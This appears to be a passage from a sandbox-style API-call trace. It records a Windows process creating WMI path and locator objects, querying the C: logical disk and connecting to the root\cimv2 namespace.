IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0198.328] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0198.328] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.329] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6027910) returned 0x0 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0198.329] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6030b00) returned 0x0 [0198.329] WbemDefPath:IUnknown:Release (This=0x6027910) returned 0x0 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6030b00) returned 0x0 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0198.329] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66ccbd8) returned 0x0 [0198.329] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccbd8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.329] WbemDefPath:IUnknown:Release (This=0x66ccbd8) returned 0x3 [0198.329] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0198.329] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0198.329] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0198.329] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0198.329] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0198.329] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0198.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6030b00) returned 0x0 [0198.330] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0198.330] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0198.330] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0198.330] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.330] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0198.330] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0198.330] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0198.330] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.331] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x6027660) returned 0x0 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027660, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0198.331] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027660, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x60305c0) returned 0x0 [0198.331] WbemDefPath:IUnknown:Release (This=0x6027660) returned 0x0 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x60305c0) returned 0x0 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0198.331] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66cca18) returned 0x0 [0198.331] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.331] WbemDefPath:IUnknown:Release (This=0x66cca18) returned 0x3 [0198.331] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0198.331] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0198.331] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0198.331] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0198.331] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0198.331] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0198.332] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0198.332] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x60305c0) returned 0x0 [0198.332] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0198.332] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0198.332] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.332] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0198.332] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0198.332] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.332] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0198.332] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0198.332] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0198.332] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.332] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x6024860) returned 0x0 [0198.332] WbemLocator:IUnknown:QueryInterface (in: This=0x6024860, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0198.333] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024860, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6027590) returned 0x0 [0198.333] WbemLocator:IUnknown:Release (This=0x6024860) returned 0x0 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6027590) returned 0x0 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0198.333] WbemLocator:IUnknown:AddRef (This=0x6027590) returned 0x3 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0198.333] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0198.333] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0198.333] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x2 [0198.333] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x1 [0198.333] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0198.333] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0198.333] WbemLocator:IUnknown:QueryInterface (in: This=0x6027590, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6027590) returned 0x0 [0198.333] WbemLocator:IUnknown:AddRef (This=0x6027590) returned 0x3 [0198.333] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x2 [0198.333] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0198.333] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0198.333] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.333] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x60276e0) returned 0x0 [0198.333] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60276e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x6033584) returned 0x0 [0198.792] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5af54) returned 0x0 [0198.793] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5af54, pProxy=0x6033584, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0198.793] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x1 [0198.793] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5af74) returned 0x0 [0198.793] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5af54) returned 0x0 [0198.793] WbemLocator:IClientSecurity:SetBlanket (This=0xb5af54, pProxy=0x6033584, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.793] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x2 [0198.793] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0198.793] CoTaskMemFree (pv=0xbd4858) [0198.793] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x0 [0198.793] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5af74) returned 0x0 [0198.793] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0198.794] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0198.794] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0198.794] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0198.794] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0198.794] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5aed4) returned 0x0 [0198.795] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aed4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.795] WbemLocator:IUnknown:Release (This=0xb5aed4) returned 0x3 [0198.795] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0198.795] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0198.795] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5af5c) returned 0x0 [0198.795] WbemLocator:IRpcOptions:Query (in: This=0xb5af5c, pPrx=0xb5af74, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0198.795] WbemLocator:IUnknown:Release (This=0xb5af5c) returned 0x3 [0198.795] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0198.795] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0198.795] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0198.796] 